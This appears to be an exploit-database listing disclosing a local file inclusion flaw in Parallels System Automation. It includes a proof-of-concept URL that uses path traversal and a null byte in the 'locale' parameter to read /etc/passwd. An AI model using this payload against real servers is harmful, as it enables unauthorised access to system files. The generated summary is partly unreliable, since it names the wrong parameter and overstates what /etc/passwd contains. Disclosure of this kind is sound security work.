header-logo
Suggest Exploit
vendor:
Parallels System Automation (PSA)
by:
Pouya Daneshmand
6,4
CVSS
MEDIUM
Local File Inclusion
98
CWE
Product Name: Parallels System Automation (PSA)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Parallels System Automation (PSA) Local File Inclusion

An attacker can exploit a local file inclusion vulnerability in Parallels System Automation (PSA) to gain access to sensitive files on the server. By manipulating the 'help_id' parameter in the 'servlet/Help' URL, an attacker can include arbitrary files from the web server. This can be exploited to include the '/etc/passwd' file, which contains the usernames and passwords of all users on the system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. Additionally, access to the vulnerable URL should be restricted to trusted users.
Source

Exploit-DB raw data:

#################################################################
# Application Info:
# Name: Parallels System Automation (PSA)
# Vendor: http://Parallels.com
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
https://cp.site.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.info
# Contacts: pouya@pouya.info
###################################################################
# Orginal Document:http://blog.pouya.info/userfiles/vul/PSA-LFI.pdf
###################################################################
# Securitylab.ir
###################################################################

Navigation

Suggest Exploit

Services By CQR